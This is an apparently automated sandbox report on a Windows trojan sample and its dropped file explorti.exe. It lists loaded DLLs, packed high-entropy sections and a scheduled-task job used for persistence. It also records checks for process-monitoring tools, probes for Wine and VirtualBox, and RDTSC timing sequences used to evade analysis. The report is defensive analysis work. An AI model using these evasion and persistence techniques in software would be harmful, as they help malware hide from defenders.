Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static file information: File size 1920000 > 1048576
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: Raw size of eqezoorp is bigger than: 0x100000 < 0x1a3400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 8.2.explorti.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1d73a5 should be: 0x1dceda
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: real checksum: 0x1d73a5 should be: 0x1dceda
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: eqezoorp
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: vzestrad
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: eqezoorp
Source: explorti.exe.0.dr Static PE information: section name: vzestrad
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E3D84C push ecx; ret 2_2_00E3D85F
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: entropy: 7.984651828533471
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: eqezoorp entropy: 7.952940556000888
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.984651828533471
Source: explorti.exe.0.dr Static PE information: section name: eqezoorp entropy: 7.952940556000888
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 96F20C second address: 96F213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF5517 second address: AF5544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FABC9471C33h 0x0000000c js 00007FABC9471C26h 0x00000012 jmp 00007FABC9471C2Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF56A3 second address: AF56A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF56A8 second address: AF56AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF5823 second address: AF583E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC90CD75Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FABC90CD75Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF59F3 second address: AF59F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF59F9 second address: AF59FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF59FD second address: AF5A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 jng 00007FABC9471C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FABC9471C26h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9951 second address: AF9983 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC90CD758h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FABC90CD761h 0x00000018 jmp 00007FABC90CD75Dh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9983 second address: AF99AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FABC9471C2Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF99AD second address: AF99D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jl 00007FABC90CD764h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FABC90CD756h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9A17 second address: AF9A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C26h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edx, 2F208977h 0x00000016 push 1DD728BDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FABC9471C38h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9A4F second address: AF9A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9B78 second address: AF9B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9D44 second address: AF9D4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABC90CD75Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9D4E second address: AF9D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FABC9471C2Ah 0x0000000d nop 0x0000000e xor si, 11A6h 0x00000013 push 00000000h 0x00000015 mov ecx, dword ptr [ebp+122D2D00h] 0x0000001b mov edi, dword ptr [ebp+122D38B9h] 0x00000021 call 00007FABC9471C29h 0x00000026 pushad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9D80 second address: AF9DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007FABC90CD756h 0x0000000c jbe 00007FABC90CD756h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC90CD764h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9DB2 second address: AF9DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9DB6 second address: AF9DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9DBA second address: AF9DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC9471C30h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9DDB second address: AF9DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9DEC second address: AF9DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9DF3 second address: AF9E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FABC90CD756h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D3901h], esi 0x00000013 push 00000003h 0x00000015 mov ecx, 18BB6F0Ch 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D1D1Bh], ebx 0x00000021 movzx edx, ax 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jnp 00007FABC90CD75Ch 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FABC90CD758h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 and edi, dword ptr [ebp+122D2CF4h] 0x0000004f mov edi, dword ptr [ebp+122D2C30h] 0x00000055 push C75AB2FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d push edi 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9E63 second address: AF9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 075AB2FCh 0x0000000f jnc 00007FABC9471C2Ch 0x00000015 lea ebx, dword ptr [ebp+1245E895h] 0x0000001b mov edi, dword ptr [ebp+122D3465h] 0x00000021 jmp 00007FABC9471C2Ah 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FABC9471C34h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AF9EAB second address: AF9EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FABC90CD756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1A28E second address: B1A29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jbe 00007FABC9471C2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEBF5F second address: AEBF84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Eh 0x00000007 ja 00007FABC90CD75Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEBF84 second address: AEBFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FABC9471C34h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEBFA0 second address: AEBFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABC90CD769h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B18359 second address: B1835D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B18752 second address: B1875C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FABC90CD756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B189EA second address: B189F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B106D7 second address: B106DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B106DD second address: B106FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C2Ah 0x00000009 popad 0x0000000a pop edi 0x0000000b jl 00007FABC9471C48h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FABC9471C26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B106FB second address: B1070B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FABC90CD756h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1070B second address: B1070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B19B33 second address: B19B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B19C97 second address: B19CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jc 00007FABC9471C2Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FABC9471C26h 0x00000014 pushad 0x00000015 jg 00007FABC9471C26h 0x0000001b jmp 00007FABC9471C2Bh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 push esi 0x00000025 pop esi 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1A160 second address: B1A165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1A165 second address: B1A17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Ch 0x00000009 jc 00007FABC9471C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1D3E9 second address: B1D413 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FABC90CD76Ch 0x00000014 rdtsc
